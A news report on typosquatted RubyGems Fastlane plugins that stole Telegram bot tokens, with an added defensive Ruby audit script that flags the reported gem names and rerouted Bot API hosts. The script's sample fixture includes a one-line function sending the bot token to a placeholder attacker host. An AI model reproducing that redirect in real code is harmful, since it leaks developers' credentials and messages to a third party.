Hackers Use Ruby Gems to Steal Telegram Bot Tokens

Hackers have launched a targeted supply chain attack against the RubyGems ecosystem, deploying malicious packages to exfiltrate Telegram bot tokens and messages. The campaign, detected by Socket.dev researchers, coincided with Vietnam’s nationwide block of Telegram on May 21, 2025. Threat actors uploaded two typosquatted gems—fastlane-plugin-telegram-proxy and fastlane-plugin-proxy_teleram—masquerading as legitimate Fastlane plugins widely used in CI/CD pipelines.

By subtly altering one line of code, the attackers rerouted Telegram API traffic to a command-and-control server hosted on Cloudflare Workers. This allowed them to intercept bot tokens, message content, and file attachments while maintaining the plugin’s expected functionality. The packages were published under aliases including Bùi nam, buidanhnam, and si_mobile.
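The change the article describes, a single edited line that points the Telegram Bot API base URL at an attacker-controlled host, is easy to miss in a diff but easy to check for mechanically. The following is an added example written for this page, not code from the article, from Socket.dev, or from the Fastlane project. It audits a `Gemfile.lock` for the two gem names the report identifies and scans plugin source text for Bot API calls (`/bot<token>/<method>`) whose host is anything other than `api.telegram.org`. The lockfile and plugin snippet below are constructed sample inputs, and `example-c2.workers.dev` is a placeholder host, not the actual command-and-control domain.

```ruby
# Added example (not from the article, Socket.dev, or Fastlane): audit a
# project's Gemfile.lock for the typosquatted gem names reported in the
# article, and scan plugin source for Telegram Bot API traffic redirected
# away from api.telegram.org.
require 'uri'

# Gem names reported in the article.
SUSPICIOUS_GEMS = %w[fastlane-plugin-telegram-proxy fastlane-plugin-proxy_teleram].freeze
LEGIT_TELEGRAM_HOST = 'api.telegram.org'

# Constructed sample lockfile: one legitimate gem plus one of the reported typosquats.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      fastlane (2.0.0)
      fastlane-plugin-telegram-proxy (0.1.0)
        fastlane
LOCK

# Constructed sample plugin source; the host is a placeholder, not the real C2.
# Single-quoted heredoc keeps the #{...} interpolation markers literal.
SAMPLE_PLUGIN_SOURCE = <<~'RUBY'
  # the only change relative to a genuine plugin would be the base URL
  def telegram_url(token, method)
    "https://example-c2.workers.dev/bot#{token}/#{method}"
  end
RUBY

# Gem names in the specs section of a Gemfile.lock: exactly four leading
# spaces, then "name (version)". Six-space lines are dependencies and are skipped.
def gems_from_lockfile(text)
  text.each_line.filter_map do |line|
    m = line.match(/\A\s{4}([A-Za-z0-9_.\-]+) \(/)
    m && m[1]
  end
end

# Lockfile gem names that match the reported typosquats.
def flag_typosquats(lockfile_text)
  gems_from_lockfile(lockfile_text) & SUSPICIOUS_GEMS
end

# Hosts of URLs in Ruby source whose path looks like a Bot API call (/bot...)
# but whose host is not api.telegram.org. The URL regex stops at '#' so that
# interpolation markers such as #{token} end the match.
def rerouted_telegram_endpoints(source)
  hosts = source.scan(%r{https?://[^\s'"#]+}).filter_map do |raw|
    uri = begin
      URI.parse(raw)
    rescue URI::InvalidURIError
      next
    end
    next unless uri.path.to_s.include?('/bot')
    next if uri.host == LEGIT_TELEGRAM_HOST
    uri.host
  end
  hosts.uniq
end

# Combine both checks over a lockfile and a list of source texts.
def audit(lockfile_text, sources)
  {
    typosquats: flag_typosquats(lockfile_text),
    rerouted_hosts: sources.flat_map { |s| rerouted_telegram_endpoints(s) }.uniq
  }
end

if __FILE__ == $PROGRAM_NAME
  report = audit(SAMPLE_LOCKFILE, [SAMPLE_PLUGIN_SOURCE])
  puts "Typosquatted gems found: #{report[:typosquats].join(', ')}"
  puts "Telegram traffic rerouted to: #{report[:rerouted_hosts].join(', ')}"
end
```

In a real pipeline the two constants would be fed from the project's own `Gemfile.lock` and from the unpacked gem contents (for example `gem unpack` output), and the host check deliberately flags any non-Telegram host rather than only `workers.dev`, since the redirect target can change between releases while the one-line edit pattern stays the same.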

The attack’s minimal code changes and strategic timing underscore growing threats to developer supply chains. Exploiting geopolitical unrest, the actors marketed the tools as Telegram workarounds, highlighting how adversaries adapt quickly to global events for cyber exploitation.
